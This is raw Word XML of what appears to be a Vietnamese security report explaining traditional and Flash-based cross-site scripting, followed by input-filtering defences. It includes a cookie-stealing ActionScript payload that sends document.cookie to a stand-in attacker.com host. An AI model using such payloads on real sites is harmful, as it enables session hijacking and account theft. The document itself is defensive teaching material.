          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B18">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="58307384" wp14:editId="2A019D88">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>207818</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4962525" cy="23050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anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00233B56" w:rsidRPr="00107BF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Các bước thực hiện XSS truyền thống:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C60239" w14:textId="24020E70" w:rsidR="00233B56" w:rsidRPr="00107BF3" w:rsidRDefault="00233B56" w:rsidP="00E42092">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00107BF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tóm tắt các bước thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2B8DB1" w14:textId="77777777" w:rsidR="00107BF3" w:rsidRDefault="00233B56" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Bước 1: Hacker biết được người dùng đang sử dụng một ứng dụng Web có lỗ   hỏng XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74663ECC" w14:textId="77777777" w:rsidR="00107BF3" w:rsidRDefault="00233B56" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00107BF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 2: Người dùng nhận được 1 liên kết thông qua email hay trên chính trang Web (như trên guestbook, banner dễ dàng thêm 1 liên kết do chính hacker tạo </w:t>
      </w:r>
      <w:r w:rsidRPr="00107BF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ra…). Thông thường hacker khiến người dùng chú ý bằng những câu kích thích    sự tò mò của người dùng như “ Kiểm tra tài khoản”, “Một phần thưởng hấp dẫn đang chờ bạn”…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701531DC" w14:textId="77777777" w:rsidR="00107BF3" w:rsidRDefault="00233B56" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Bước 3: Chuyển nội dung thông tin (cookie, tên, mật khẩu…) về máy chủ của hacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9F3D60" w14:textId="77777777" w:rsidR="00107BF3" w:rsidRDefault="00233B56" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Bước 4: Hacker tạo một chương trình cgi (ở ví dụ 3 này là steal.cgi) hoặc một  trang Web để ghi nhận những thông tin đã đánh cắp vào 1 tập tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C64AB39" w14:textId="11121AEA" w:rsidR="00233B56" w:rsidRDefault="00233B56" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00233B56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bước 5: Sau khi nhận được thông tin cần thiết, hacker có thể sử dụng để thâm   nhập vào tài khoản của người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528CFDEF" w14:textId="2240F2DB" w:rsidR="00EC7A6B"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25" w:name="_Toc59634029"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tấn công XSS bằng Flash</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="30B16E83" w14:textId="1980BE6C" w:rsidR="005C5B18" w:rsidRDefault="005C5B18" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Ngoài những cách đưa một đoạn mã nguy hiểm thì hacker còn có thể lợi dụng những tập tin flash để đánh cắp thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150F3D0F" w14:textId="2953AB3C" w:rsidR="005C5B18" w:rsidRDefault="005C5B18" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Macromedia Flash cho phép lập trình bằng một ngôn ngữ kịch bản đã được xây dụng sẵn trong Flash là ActionScript. ActionScript có cú pháp đơn giản và tương tự như JavaScript, C hay PERL. Ví dụ hàm getURL() dùng để gọi một trang web khác, tham số thường là một URL chẳng hạn như “http://www.yahoo.com”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200C237B" w14:textId="591D791C" w:rsidR="005C5B18" w:rsidRDefault="005C5B18" w:rsidP="00E420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4DEEF02B" wp14:editId="1B052FF1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>948690</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>180975</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4983480" cy="264160"/>
                <wp:effectExtent l="0" t="0" r="26670" b="2159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64160"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E6E6E6"/>
                        </a:solidFill>
                        <a:ln w="6096">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5277195D" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="005C5B18">
                            <w:pPr>
                              <w:spacing w:before="30"/>
                              <w:ind w:left="106"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                              <w:t>getURL(</w:t>
                            </w:r>
                            <w:hyperlink r:id="rId30">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                                  <w:sz w:val="21"/>
                                </w:rPr>
                                <w:t>“http://www.yahoo.com</w:t>
                              </w:r>
                            </w:hyperlink>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                                <w:sz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EF02B" id="Text Box 10" o:spid="_x0000_s1097" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:74.7pt;margin-top:14.25pt;width:392.4pt;height:20.8pt;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" fillcolor="#e6e6e6" strokeweight=".48pt">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5277195D" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="005C5B18">
                      <w:pPr>
                        <w:spacing w:before="30"/>
                        <w:ind w:left="106"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>getURL(</w:t>
                      </w:r>
                      <w:hyperlink r:id="rId31">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                            <w:sz w:val="21"/>
                          </w:rPr>
                          <w:t>“http://www.yahoo.com</w:t>
                        </w:r>
                      </w:hyperlink>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>”)</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4800C918" w14:textId="5ABC0EF2" w:rsidR="005C5B18" w:rsidRDefault="005C5B18" w:rsidP="00E420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1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="62807AEF" wp14:editId="310CF99B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>948690</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>475303</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4983480" cy="264160"/>
                <wp:effectExtent l="0" t="0" r="26670" b="2159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264160"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E6E6E6"/>
                        </a:solidFill>
                        <a:ln w="6096">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="08463D32" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="005C5B18">
                            <w:pPr>
                              <w:spacing w:before="30"/>
                              <w:ind w:left="106"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                              <w:t>getURL(“javascript:alert(document.coo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07AEF" id="Text Box 11" o:spid="_x0000_s1098" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:74.7pt;margin-top:37.45pt;width:392.4pt;height:20.8pt;z-index:-2516561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" fillcolor="#e6e6e6" strokeweight=".48pt">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="08463D32" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="005C5B18">
                      <w:pPr>
                        <w:spacing w:before="30"/>
                        <w:ind w:left="106"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>getURL(“javascript:alert(document.cookie)”)</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C5B18">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tuy nhiên có thể thay thế URL bằng JavaScript:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4C9F83" w14:textId="6C209FED" w:rsidR="005C5B18" w:rsidRDefault="005C5B18" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1530"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B18">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ví dụ trên sẽ làm xuất hiện bảng thông báo chứa  cookie của trang web chứa  tập tin flash đó. Như vậy là trang web đó đã bị tấn công, bằng cách chèn một đoạn JavaScript vào ứng dụng Web thông qua tập tin flash. Một ví dụ khác rõ hơn về cách tấn công này là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567940EC" w14:textId="6B56C4D0" w:rsidR="005C5B18" w:rsidRDefault="005C5B18" w:rsidP="00E420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5F91071" wp14:editId="59D08CF8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>474345</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5009515" cy="497205"/>
                <wp:effectExtent l="0" t="0" r="19685" b="17145"/>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515" cy="497205"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E6E6E6"/>
                        </a:solidFill>
                        <a:ln w="6096">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="405AE60B" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="005C5B18">
                            <w:pPr>
                              <w:spacing w:before="29" w:line="369" w:lineRule="auto"/>
                              <w:ind w:left="106"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                              <w:t>getURL(“javascript:location</w:t>
                            </w:r>
                            <w:hyperlink r:id="rId32">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                                  <w:sz w:val="21"/>
                                </w:rPr>
                                <w:t>(‘http://www.attacker.com?newcookie</w:t>
                              </w:r>
                            </w:hyperlink>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                                <w:sz w:val="21"/>
                              </w:rPr>
                              <w:t>=’+do cument.cook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1071" id="Text Box 12" o:spid="_x0000_s1099" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:343.25pt;margin-top:37.35pt;width:394.45pt;height:39.15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" fillcolor="#e6e6e6" strokeweight=".48pt">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="405AE60B" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="005C5B18">
                      <w:pPr>
                        <w:spacing w:before="29" w:line="369" w:lineRule="auto"/>
                        <w:ind w:left="106"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>getURL(“javascript:location</w:t>
                      </w:r>
                      <w:hyperlink r:id="rId33">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                            <w:sz w:val="21"/>
                          </w:rPr>
                          <w:t>(‘http://www.attacker.com?newcookie</w:t>
                        </w:r>
                      </w:hyperlink>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                          <w:sz w:val="21"/>
                        </w:rPr>
                        <w:t>=’+do cument.cookie)”)</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C5B18">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Đây là đoạn lệnh trong tập tin flash và sẽ được thi hành khi tập tin flash được đọc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C81114E" w14:textId="0A23E928" w:rsidR="005C5B18" w:rsidRDefault="005C5B18" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1530"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B18">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Như vậy là khi người dùng xem trang web chứa tập tin flash này thì ngay lập tức cookie của họ do trang web chứa tập tin flash đó tạo ra sẽ gửi về cho hacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB45AE8" w14:textId="41ADDCCD" w:rsidR="005C5B18" w:rsidRDefault="005C5B18" w:rsidP="00E420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89E36" wp14:editId="123D90A6">
            <wp:extent cx="4477385" cy="1552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7385" cy="1552575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FC8714" w14:textId="77777777" w:rsidR="005C5B18" w:rsidRDefault="005C5B18" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1530"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C00FC8" w14:textId="77777777" w:rsidR="008872A1" w:rsidRDefault="00EC7A6B" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc59634030"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cách phòng chống</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="7EB023F2" w14:textId="77777777" w:rsidR="008872A1" w:rsidRDefault="005C5B18" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008872A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Với những dữ liệu, thông tin nhập của người dùng, người thiết kế ứng dụng Web cần phải thực hiện vài bước cơ bản sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B116C7"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Tạo ra danh sách những thẻ HTML được phép sử dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F2540D"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Xóa bỏ thẻ &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0B434A"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Lọc ra bất kì một đoạn mã JavaScript/Java/VBScript/ActiveX/Flash Related nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A23BFF9"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Lọc dấu nháy đơn hay kép</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171FE1A6"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Lọc kí tự Null ( vì khả năng thêm một đoạn mã bất kì sau kí tự Null khiến cho ứng dụng dù đã lọc bỏ thẻ &lt;script&gt; vẫn không nhận ra do ứng dụng nghĩ rằng chuỗi đã kết thúc từ kí tự Null này).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E62557"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Xóa những kí tự “ &gt; ”, “ &lt; ”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189B206E" w14:textId="77777777" w:rsidR="008872A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Vẫn cho phép nhập những kí tự đặc biệt nhưng sẽ được mã hóa theo chuẩn riêng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D0D0C5" w14:textId="0FE328A6" w:rsidR="00903C21" w:rsidRDefault="005C5B18" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B18">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Đối với người dùng, cần cấu hình lại trình duyệt để nhắc nhở người dùng có cho thực thi ngôn ngữ kịch bản trên máy của họ hay không? Tùy vào mức độ tin cậy  mà người dùng sẽ quyết định.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40116C34" w14:textId="77777777" w:rsidR="003A61ED" w:rsidRPr="00903C21" w:rsidRDefault="003A61ED" w:rsidP="008872A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003A61ED" w:rsidRPr="00903C21">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F745" w14:textId="77777777" w:rsidR="003A262D" w:rsidRDefault="003A262D" w:rsidP="0096149B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4FFD3B4F" w14:textId="77777777" w:rsidR="003A262D" w:rsidRDefault="003A262D" w:rsidP="00961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856819"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="249ADA4D" w14:textId="4E0A79EB" w:rsidR="00E42092" w:rsidRDefault="00E42092">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="center"/>
        </w:pPr>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="755C4541" w14:textId="77777777" w:rsidR="00E42092" w:rsidRDefault="00E42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5206469"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="17BA55CA" w14:textId="77F53B19" w:rsidR="00E42092" w:rsidRDefault="00E420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0251B" w14:textId="77777777" w:rsidR="00E42092" w:rsidRDefault="00E42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9770F" w14:textId="77777777" w:rsidR="003A262D" w:rsidRDefault="003A262D" w:rsidP="0096149B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="49773061" w14:textId="77777777" w:rsidR="003A262D" w:rsidRDefault="003A262D" w:rsidP="00961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BE059" w14:textId="77777777" w:rsidR="00E42092" w:rsidRDefault="00E42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ED63" w14:textId="77777777" w:rsidR="00E42092" w:rsidRDefault="00E42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35C52"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B896DD7C"/>
    <w:lvl w:ilvl="0" w:tplc="51721BA8">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F01636"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="76D41768"/>
    <w:lvl w:ilvl="0" w:tplc="51721BA8">
      <w:start w:val="3"/>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35A1F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932593"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="65DADCB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BFA5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D66B59"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F5D8FE80"/>
